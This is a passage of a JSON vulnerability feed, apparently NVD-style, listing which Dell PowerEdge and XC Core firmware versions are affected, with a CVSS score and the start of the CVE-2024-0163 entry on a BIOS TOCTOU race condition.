} ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8610t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8610t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8620t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8620t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr7620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr7620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx750c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx750c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr11_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr11:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr12_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr12:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t150_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r250_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r250:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4510c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4510c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4520c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4520c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8545_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8545:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.0, "impactScore" : 6.0 } }, "publishedDate" : "2024-03-13T17:15Z", "lastModifiedDate" : "2025-02-04T17:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0163", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222756/dsa-2024-003-security-update-for-dell-poweredge-server-bios-for-a-time-of-check-time-of-use-toctou-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222756/dsa-2024-003-security-update-for-dell-poweredge-server-bios-for-a-time-of-check-time-of-use-toctou-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222756/dsa-2024-003-security-update-for-dell-poweredge-server-bios-for-a-time-of-check-time-of-use-toctou-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222756/dsa-2024-003-security-update-for-dell-poweredge-server-bios-for-a-time-of-check-time-of-use-toctou-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain a TOCTOU race condition vulnerability. A local low privileged attacker could potentially exploit this vulnerability to gain access to otherwise unauthorized resources." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx760c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx760c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r860_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r860:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r960_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r960:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : 